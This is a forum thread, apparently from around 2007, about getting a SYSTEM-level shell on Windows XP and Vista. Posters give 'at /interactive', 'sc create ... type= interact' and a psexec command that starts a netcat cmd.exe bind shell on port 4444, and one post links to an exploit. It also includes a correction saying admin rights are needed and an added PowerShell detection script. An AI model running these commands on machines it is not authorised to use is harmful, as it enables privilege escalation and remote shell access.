wethcr

Windows System User

18 posts in this topic

When was it found out that you could log onto the Windows XP SYSTEM account from a limited account? Yes, you have full control of the computer and domain if you're on one.
Just wondering, because it's a nice little thing to know, and I'm curious as to how long after XP was released it was found.

Is this even a well-known issue with XP?
Edited by wethcr

Depends on what you mean by logging into the SYSTEM account. If you're talking about that, I know the one I use works in 2000, XP, 2003, and Vista.

Use the command [codebox]at (insert time + 1 minute here) /interactive cmd.exe[/codebox]
A new Command Prompt will open; next, open up the Task Manager. End explorer.exe and start it again from the new Command Prompt by typing explorer.exe. The desktop will refresh, and voila, you are superuser. Just log off and log on again to go back. As superuser you can control everything.

[codebox]rem remove any stale copy, then register an interactive service (runs as LocalSystem by default)
sc delete killall
rem quotes inside binpath= must be escaped as \" or sc mis-parses the command line
sc create killall binpath= "cmd /K start c:\cax /killuser \"%username%\"" type= own type= interact
rem the service control manager launches the binpath under LocalSystem
sc start killall[/codebox]

sc runs as SYSTEM.

We were messing with this today on our school network (with permission). We get our own hard drives for our labs and we can put/do whatever we want on these HDs. The 'at' command can be run by users with more than regular user account privileges. The guest account can't do this on Vista or WinXP, but in earlier versions of Windoze you can do A LOT more than you think with the Guest account. So for those with Windows ME/2000/2003, try it out in the guest account; it works in most cases. But operator posted the best option. :)

Thanks for the info, everyone. Could someone elaborate on operator's post with the SC commands, please? It seems like something that would be good to know.

Thanks
Wethcr

[url="http://support.microsoft.com/kb/251192"]http://support.microsoft.com/kb/251192[/url]

This is a cool trick and all... but how do you run AT with any account that isn't a member of the local Administrators group?

From [url="http://www.microsoft.com/resources/documentation/windows/xp/all/proddocs/en-us/ntcmds.mspx?mfr=true"]http://www.microsoft.com/resources/documentation/windows/xp/all/proddocs/en-us/ntcmds.mspx?mfr=true[/url]:

[quote]Using at

To use at, you must be a member of the local Administrators group.[/quote]

Every so many months, these boards get random postings consisting of "You can escalate Windows privileges using AT," and some posters even claim this can be done with a regular user.

I assure you this is NOT the case in a normally configured system. While you can escalate administrator-level privileges to the SYSTEM account, you can't do this with a regular user. Just because you're not logged in as "Administrator" doesn't mean you're not [b]an[/b] administrator of the system. I think a lot of you are getting confused, thinking that just because your user account isn't named "Administrator," it must not be an administrator, and thus that this trick can be performed with a generic user account.

Try AT out sometime with an account you are positive is only a member of the regular "Users" group. You will be pleasantly disappointed.
Edited by Dirk Chestnut

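Whether the `at` trick needs Administrators membership, and what the `sc create ... type= own type= interact` variant earlier in the thread leaves behind, are both things you can check on the box itself. The following PowerShell is an added example written for this page, not code posted by anyone in the thread. It asks the current token whether it carries the local Administrators group (the precondition Dirk Chestnut describes, checked by SID rather than by account name), reports the account the Task Scheduler service runs under (which is why an `at` job lands in SYSTEM), and lists services whose registry Type value has the SERVICE_INTERACTIVE_PROCESS bit set, with the ones whose ImagePath launches cmd.exe flagged. The cmd.exe pattern used for flagging is my assumption about what such a leftover service looks like; the SID, the Type bit and the registry path are documented Windows values.

```powershell
# Added example for this thread, not code posted by any participant.
# Written for PowerShell 2.0 and later (XP SP3 / 2003 with PS 2.0 included),
# so it avoids PS 3.0-only syntax such as [pscustomobject].

function Test-IsLocalAdmin {
    # Ask the current token whether it carries the well-known local
    # Administrators group, S-1-5-32-544, instead of comparing the user
    # name to "Administrator".
    $identity  = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object System.Security.Principal.WindowsPrincipal($identity)
    $adminSid  = New-Object System.Security.Principal.SecurityIdentifier('S-1-5-32-544')
    # Caveat: on Vista and later with UAC, a non-elevated admin holds a
    # filtered token and this returns False until the shell is elevated.
    return $principal.IsInRole($adminSid)
}

function Get-SchedulerAccount {
    # The Task Scheduler service ("Schedule") executes at.exe jobs; its
    # StartName is the account those jobs inherit, normally LocalSystem.
    $svc = Get-WmiObject -Class Win32_Service -Filter "Name='Schedule'"
    if ($svc) { return $svc.StartName } else { return $null }
}

function Get-InteractiveServices {
    # SERVICE_INTERACTIVE_PROCESS is bit 0x100 of the Type value under
    # HKLM\SYSTEM\CurrentControlSet\Services\<name>. "type= own type= interact"
    # stores 0x110 (own process + interactive).
    $root = 'HKLM:\SYSTEM\CurrentControlSet\Services'
    foreach ($key in Get-ChildItem -Path $root -ErrorAction SilentlyContinue) {
        $props = Get-ItemProperty -Path $key.PSPath -ErrorAction SilentlyContinue
        if ($props -eq $null -or $props.Type -eq $null) { continue }
        if (($props.Type -band 0x100) -eq 0) { continue }
        $image = [string]$props.ImagePath
        # Assumption: an ImagePath that starts cmd.exe directly is the
        # tell-tale of the sc create trick; real services rarely do this.
        $suspicious = $image -match '(^|\\|")cmd(\.exe)?(\s|"|$)'
        New-Object PSObject -Property @{
            Name       = $key.PSChildName
            Type       = ('0x{0:X}' -f [int]$props.Type)
            ImagePath  = $image
            Suspicious = $suspicious
        }
    }
}

# Usage: run from an ordinary prompt; no elevation is needed to read these keys.
'Current user      : {0}' -f [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
'Local admin       : {0}' -f (Test-IsLocalAdmin)
'Scheduler runs as : {0}' -f (Get-SchedulerAccount)
Get-InteractiveServices | Sort-Object Suspicious -Descending | Format-Table -AutoSize
```

If Test-IsLocalAdmin prints False for an account that can nevertheless run `at`, the account is not a plain member of Users: look at the groups it inherits (for example through a nested domain group) before concluding that `at` itself is the problem. The interactive-service listing is also the cheapest way to find a forgotten `killall`-style service after someone has tried the trick on a shared machine.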
You don't have to be in the admin group to run at. We do this at school all the time with our plain old student account. And I know that isn't admin, because we can't even install anything.

It may just be a poorly configured account, i.e. more than a regular user account in the Users group. The account could also be an account created for students and not set to a default user. The person who set it up may just have forgotten about 'at'.

psexec can do wonders too!

Suppose you have nc.exe located at c:\windows\system32:
[codebox]psexec -d -s c:\windows\system32\nc.exe -L -p 4444 -d -e cmd.exe[/codebox]
This will run netcat under the SYSTEM account, and psexec will exit after execution!

Better use the old version of psexec which came with BackTrack 1; the newer one shows a license agreement (it cannot be run on remote machines as it pulls up a GUI!).
Edited by Anon-De-Anonymous

[quote name='Hartley' post='251951' date='Apr 17 2007, 07:04 AM']sc create hak binpath= "cmd /K start" type= own type= interact

works well good. :ranaway:[/quote]

That works with Admin privileges only, and not as a User.

Could use this way: [url="http://www.hak5.org/wiki/Administrator_Control"]http://www.hak5.org/wiki/Administrator_Control[/url]

[quote name='Hartley' post='252249' date='Apr 18 2007, 01:26 PM']could use this way [url="http://www.hak5.org/wiki/Administrator_Control"]http://www.hak5.org/wiki/Administrator_Control[/url][/quote]

Yeah, that must work! Thanks.

The best way would be to use a real exploit like this one: [url="http://www.milw0rm.com/exploits/3755"]http://www.milw0rm.com/exploits/3755[/url]. I have never taken any time to understand them, though, so I've never used one.

